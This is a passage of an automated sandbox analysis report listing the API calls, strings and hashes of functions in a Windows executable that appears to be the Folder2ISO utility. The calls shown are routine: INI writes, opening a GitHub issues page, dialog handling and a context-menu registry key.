                  • Opcode Fuzzy Hash: 9cc37737b00798d4d895fb2e47299d26ba330b1cd20761385952386f396e99c7
                  • Instruction Fuzzy Hash: D1112932C083A55FC720AF64C888ABB77DAEF40355F040A7CF4644B296EB209D09CBD2
                  APIs
                  • WritePrivateProfileStringW.KERNEL32(General,OutputDir,00000000,C:\Users\user\Desktop\6RVmzn1DzL.ini), ref: 00621E86
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: PrivateProfileStringWrite
                  • String ID: C:\Users\user\Desktop\6RVmzn1DzL.ini$General$OutputDir
                  • API String ID: 390214022-2386769019
                  • Opcode ID: f7f1bbbb11ebee27fa40954b8ed45eb0de7cf3e3173aa02bf6acf2e7d85cb1e0
                  • Instruction ID: b665e3aa6b2754de07057ad48191db843868ca8666f5bc7ea7e7dedbb20a4f0b
                  • Opcode Fuzzy Hash: f7f1bbbb11ebee27fa40954b8ed45eb0de7cf3e3173aa02bf6acf2e7d85cb1e0
                  • Instruction Fuzzy Hash: C50168349003199ACB209F64EC06AE573B6EF02700F1141DAE9048F192EB705D84CF56
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,https://github.com/imgdrive/Folder2ISO/issues,000000FF,?,00000104,00000000), ref: 00622E6E
                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00622E85
                  Strings
                  • https://github.com/imgdrive/Folder2ISO/issues, xrefs: 00622E6B
                  • open, xrefs: 00622E7F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ByteCharExecuteMultiShellWide
                  • String ID: https://github.com/imgdrive/Folder2ISO/issues$open
                  • API String ID: 2498257828-3328090493
                  • Opcode ID: 5ac4be6d6be76816444027932c56c3068cdab05e02acb4cefd029fc2430ac32a
                  • Instruction ID: e8f563bd0026ce88072997cdc031fdcf96df89d6b2774e507baeb5688dce315d
                  • Opcode Fuzzy Hash: 5ac4be6d6be76816444027932c56c3068cdab05e02acb4cefd029fc2430ac32a
                  • Instruction Fuzzy Hash: B3F0E5B550222CBBE720DB619C0DDEF7BADEF06720F510255F925D61C1EA306A04CBE5
                  APIs
                  • wsprintfW.USER32 ref: 00621260
                  • WritePrivateProfileStringW.KERNEL32(General,?,?,C:\Users\user\Desktop\6RVmzn1DzL.ini), ref: 00621278
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: PrivateProfileStringWritewsprintf
                  • String ID: C:\Users\user\Desktop\6RVmzn1DzL.ini$General
                  • API String ID: 1995626314-2908971957
                  • Opcode ID: 41e4994a67c1bfe14b812070325aa5e9a6dc831b2a3dd5a711bc2b74b48027e7
                  • Instruction ID: f198dc5b1a6895aed9603567c48e6788f8d83268bcd42510ef0ef39e473ae926
                  • Opcode Fuzzy Hash: 41e4994a67c1bfe14b812070325aa5e9a6dc831b2a3dd5a711bc2b74b48027e7
                  • Instruction Fuzzy Hash: 69F0A7B5A4020DAB8F00EFA4AD05C9E77AAEF05711B405425FD01D7250D671AA15C7A1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID:
                  • API String ID: 2102423945-0
                  • Opcode ID: fcedea1ba1fac22df869343fdc51b1586a97789a7b08e1adce8f18b9ec33e549
                  • Instruction ID: 1d8783a901e2b1ba475f01342cdc8242066eb38dde36794bf6653cbe4ce0338f
                  • Opcode Fuzzy Hash: fcedea1ba1fac22df869343fdc51b1586a97789a7b08e1adce8f18b9ec33e549
                  • Instruction Fuzzy Hash: 4431F2325043419BC720AF54D844BAB7AAAEF91774F14192CF85967391DB71C802CBE6
                  APIs
                  • PathCanonicalizeW.SHLWAPI(?,?,75A88FB0,75A85420,00000000,?), ref: 00625BCD
                  • _memset.LIBCMT ref: 00625C19
                  • _strncpy.LIBCMT ref: 00625C8C
                  • _strncpy.LIBCMT ref: 00625C9F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _strncpy$CanonicalizePath_memset
                  • String ID:
                  • API String ID: 2595827489-0
                  • Opcode ID: d273ed9c975cf96cfaf04237f2999c7329dba3fb9579c0e070732983394831a1
                  • Instruction ID: b6e1c5470e71dc43b61cf61bcef513083bb492ef5576ac15e1d5bc8878b4f183
                  • Opcode Fuzzy Hash: d273ed9c975cf96cfaf04237f2999c7329dba3fb9579c0e070732983394831a1
                  • Instruction Fuzzy Hash: CF31F135604B119BC334EF68E885BA7B3F6FF88700F10491DE54A87291FB35A509CB96
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _strncmp
                  • String ID:
                  • API String ID: 909875538-0
                  • Opcode ID: e13d7f3a35593d2a9a626da55e83e707ec93248fedb2749311de833817991b8d
                  • Instruction ID: e710d4974a7f84eaf0858d5ef15e3062a0b866ac34df3df6813aae907e93c406
                  • Opcode Fuzzy Hash: e13d7f3a35593d2a9a626da55e83e707ec93248fedb2749311de833817991b8d
                  • Instruction Fuzzy Hash: 723149B2D049322FF76212A07C55B7BE61A5F21B46F0C4629FF0858747F1848D945AE7
                  APIs
                    • Part of subcall function 0063325B: GetStartupInfoW.KERNEL32(?), ref: 00633265
                    • Part of subcall function 00633A58: GetProcessHeap.KERNEL32(0062F4ED,0064C5D8,00000010), ref: 00633A58
                  • __RTC_Initialize.LIBCMT ref: 0062F50A
                  • GetCommandLineA.KERNEL32(0064C5D8,00000010), ref: 0062F524
                  • __setargv.LIBCMT ref: 0062F539
                    • Part of subcall function 0062F5AE: __FF_MSGBANNER.LIBCMT ref: 0062F5B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CommandHeapInfoInitializeLineProcessStartup__setargv
                  • String ID:
                  • API String ID: 3115846406-0
                  • Opcode ID: f123788d20bb69f94479bff32fa77201cbfc55029f66cc814d55b2043a3a8f81
                  • Instruction ID: 149664eaa973c9f881c932e8f5620316f1ee4d33cff94dea8a71ba3e3d517af7
                  • Opcode Fuzzy Hash: f123788d20bb69f94479bff32fa77201cbfc55029f66cc814d55b2043a3a8f81
                  • Instruction Fuzzy Hash: C911E6716407226AFBD07FB1A913B2E23E79F10315F10083DF500AA2D3DEA4D6405AED
                  APIs
                  • GetDlgItemTextW.USER32(?,0000000D,?,00000104), ref: 0062216B
                  • SHGetFolderPathW.SHELL32(00000000,00008005,00000000,00000000,?,?,00000104), ref: 00622193
                  • CoInitialize.OLE32(00000000), ref: 0062219A
                  • CoUninitialize.OLE32(?,?,00000104), ref: 006221C4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: FolderInitializeItemPathTextUninitialize
                  • String ID:
                  • API String ID: 3907999222-0
                  APIs
                  • DeleteObject.GDI32 ref: 00622DCD
                  • EndDialog.USER32(?,00000001), ref: 00622DDF
                  • GetDlgItem.USER32(?,00000032), ref: 00622DFD
                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00622E12
                  Similarity
                  • API ID: DeleteDialogItemMessageObjectSend
                  • String ID:
                  • API String ID: 3485863115-0
                  APIs
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  APIs
                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00622C0F
                  • _memset.LIBCMT ref: 00622C21
                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 00622C30
                  • CreateFontIndirectW.GDI32(?), ref: 00622C41
                  Similarity
                  • API ID: CreateFontIndirectMessageObjectSend_memset
                  • String ID:
                  • API String ID: 2248381337-0
                  APIs
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00632C18
                  • __initp_misc_cfltcvt_tab.LIBCMT ref: 00632C2D
                  • __initterm_e.LIBCMT ref: 00632C3C
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00632C72
                  Similarity
                  • API ID: CurrentImageNonwritable$__initp_misc_cfltcvt_tab__initterm_e
                  • String ID:
                  • API String ID: 321396692-0
                  APIs
                    • Part of subcall function 00629B2F: _memmove.LIBCMT ref: 00629B44
                  • std::_Xinvalid_argument.LIBCPMT ref: 006289FC
                  Strings
                  Similarity
                  • API ID: Xinvalid_argument_memmovestd::_
                  • String ID: deque<T> too long$s+b
                  • API String ID: 256744135-3108237626
                  APIs
                    • Part of subcall function 0063388B: __getptd_noexit.LIBCMT ref: 0063388C
                  • _CallSETranslator.LIBCMT ref: 006394D7
                  Strings
                  Similarity
                  • API ID: CallTranslator__getptd_noexit
                  • String ID: MOC$RCC
                  • API String ID: 608174979-2084237596
                  APIs
                  • PathIsRelativeW.SHLWAPI(00000000,?,00000000), ref: 00621427
                  • PathCombineW.SHLWAPI(?,?,00000000), ref: 00621438
                  Strings
                  Similarity
                  • API ID: Path$CombineRelative
                  • String ID: PstTt
                  • API String ID: 2123060961-1890372139
                  APIs
                  • std::_Xinvalid_argument.LIBCPMT ref: 0062EC99
                  • __EH_prolog3.LIBCMT ref: 0062ECA6
                    • Part of subcall function 0062EBC9: __EH_prolog3_catch.LIBCMT ref: 0062EBD0
                  Strings
                  Similarity
                  • API ID: H_prolog3H_prolog3_catchXinvalid_argumentstd::_
                  • String ID: vector<T> too long
                  • API String ID: 1050700602-3788999226
                  APIs
                  Strings
                  Similarity
                  • API ID: H_prolog3
                  • String ID: 0020$HDMV
                  • API String ID: 431132790-2900241748
                  APIs
                  • RegOpenKeyW.ADVAPI32(80000001,Software\Classes\Folder\shell\Folder2ISO,?), ref: 00621617
                  • RegCloseKey.ADVAPI32(?,?,00000001,006218C9), ref: 00621624
                  Strings
                  • Software\Classes\Folder\shell\Folder2ISO, xrefs: 0062160D
                  Similarity
                  • API ID: CloseOpen
                  • String ID: Software\Classes\Folder\shell\Folder2ISO
                  • API String ID: 47109696-1743991603